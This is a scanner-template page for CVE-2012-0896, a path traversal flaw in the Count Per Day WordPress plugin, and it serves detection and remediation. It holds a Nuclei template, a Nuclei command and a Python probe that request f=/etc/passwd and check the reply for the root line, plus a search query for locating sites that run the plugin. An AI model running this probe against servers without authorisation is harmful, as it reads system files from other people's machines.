Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
ID: CVE-2012-0896
Severity: medium
Author: daffainfo
Tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project
Description
An absolute path traversal vulnerability in download.php in the Count Per Day WordPress plugin before 3.1.1 allows remote attackers to read arbitrary files via the f parameter. The value of f is used as a filesystem path without being confined to the plugin's own download directory, so an unauthenticated GET request with f=/etc/passwd returns the contents of that file (CWE-22; CVSS 2.0 base score 5.0, confidentiality impact only).
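The bug class behind this advisory, as an added illustration rather than the plugin's own code (the page does not show download.php): a hypothetical download handler that joins a base directory with the user-supplied f. With os.path.join, an absolute f discards the base directory outright, which is exactly why f=/etc/passwd works against an absolute path traversal; the hardened variant rejects absolute names, NUL bytes and anything that escapes the directory after canonicalisation. EXPORT_DIR and the file names are assumptions made for the example.

```python
import os
from typing import Optional

# Assumed download directory for the example; not a path taken from the real plugin.
EXPORT_DIR = "/var/www/html/wp-content/plugins/count-per-day/downloads"


def resolve_naive(base_dir: str, f: str) -> str:
    """Bug-class stand-in: join the base directory with the user-supplied name.

    os.path.join drops every earlier component once it meets an absolute path,
    so f="/etc/passwd" resolves to /etc/passwd and base_dir is never consulted.
    That is the absolute path traversal pattern (CWE-22) this CVE describes.
    """
    return os.path.normpath(os.path.join(base_dir, f))


def resolve_hardened(base_dir: str, f: str) -> Optional[str]:
    """Return a path only if it stays inside base_dir; otherwise None.

    Absolute names and NUL bytes are refused up front. Both sides are then
    canonicalised (realpath follows symlinks and collapses ../) and the result
    must still have base_dir as its prefix, component-wise, not string-wise.
    """
    if not f or os.path.isabs(f) or "\0" in f:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, f))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo() -> dict:
    """Run both resolvers over the template's probe value and a few neighbours."""
    names = ["/etc/passwd", "../../../../../../etc/passwd", "report.csv", ""]
    return {n: (resolve_naive(EXPORT_DIR, n), resolve_hardened(EXPORT_DIR, n)) for n in names}


if __name__ == "__main__":
    for name, (naive, hardened) in demo().items():
        print(f"f={name!r:40} naive={naive}  hardened={hardened}")
```

The containment check uses os.path.commonpath rather than str.startswith so that a sibling directory such as downloads-old is not accepted as "inside" downloads.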
YAML Source

```yaml
id: CVE-2012-0896

info:
  name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
  author: daffainfo
  severity: medium
  description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
  remediation: |
    Upgrade to a patched version of the Count Per Day plugin (3.1.1 or later, matching the affected range in the description) or apply the vendor-supplied changeset to fix the path traversal vulnerability.
  reference:
    - https://packetstormsecurity.com/files/108631/
    - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0896
    - http://wordpress.org/extend/plugins/count-per-day/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0896
    cwe-id: CWE-22
    epss-score: 0.01844
    epss-percentile: 0.883
    cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: count_per_day_project
    product: count_per_day
    google-query: inurl:"/wp-content/plugins/count-per-day"
  tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402201f013765f17ee876af22ead30f83a1c24170c2766cd6357374b03106fd82a09102200ffc9df0dc31b1a2db500b12fc27c0f3e4f20d281327309b568ca7d9ec02c741:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities

This template sends a single GET request (max-request: 1) to download.php with f=/etc/passwd and reports a match only when both matchers hit: the response status is 200 and the body contains a root account line matching root:.*:0:0:. Because the probe targets a Unix-specific file, a vulnerable plugin running on a Windows host will not match; a negative result there does not rule the issue out. Run it with Nuclei against the target's base URL:

```shell
nuclei -u "URL" -t "http/cves/2012/CVE-2012-0896.yaml"
```
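The same matcher logic as the template, reproduced as an added Python example (not part of the Nuclei template or the Nuclei code base) so the decision rule can be exercised against constructed responses: the URL is built the way {{BaseURL}} expansion would, and a hit requires status 200 plus the root entry regex, exactly as matchers-condition: and specifies. The probe() function performs the live request with the standard library; the SAMPLE_RESPONSES are constructed for the example, not captured from any host.

```python
import re
import urllib.error
import urllib.request

# Probe path from the template, with {{BaseURL}} stripped off.
PROBE_PATH = "/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
# Template regex matcher: the root account line of /etc/passwd.
ROOT_ENTRY = re.compile(r"root:.*:0:0:")


def build_probe_url(base_url: str) -> str:
    """Mirror {{BaseURL}} expansion: append the probe path to the target base."""
    return base_url.rstrip("/") + PROBE_PATH


def template_matches(status: int, body: str) -> bool:
    """matchers-condition: and -> the status matcher and the regex matcher must both hit."""
    return status == 200 and ROOT_ENTRY.search(body) is not None


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the one GET the template sends and apply the matchers to the live response.

    Non-2xx responses arrive as HTTPError; their body is still evaluated so the
    decision mirrors Nuclei, which applies matchers to whatever status came back.
    """
    req = urllib.request.Request(
        build_probe_url(base_url), headers={"User-Agent": "CVE-2012-0896-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return template_matches(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return template_matches(err.code, err.read().decode("utf-8", "replace"))


# Constructed responses covering the cases the two matchers are meant to separate.
SAMPLE_RESPONSES = {
    # Traversal works: the file is served with a 200.
    "vulnerable": (200, "root:x:0:0:root:/root:/bin/bash\n"
                        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"),
    # Patched handler refuses the path and returns an empty 200.
    "patched": (200, ""),
    # Plugin not installed: generic WordPress 404 page.
    "missing": (404, "<html><body><h1>404 Not Found</h1></body></html>"),
    # Regex would hit, but the status matcher does not: no match under 'and'.
    "error_with_leak": (500, "Warning: readfile(): ... root:x:0:0:root:/root:/bin/bash"),
}


def classify_samples() -> dict:
    """Apply the template decision to every constructed response."""
    return {name: template_matches(status, body) for name, (status, body) in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:16} -> {'MATCH' if verdict else 'no match'}")
```

The error_with_leak case is the one to remember when tuning this kind of template: a PHP warning that echoes the file contents would be missed by the status matcher even though the traversal clearly worked, so when triaging manually look at the body of non-200 responses as well.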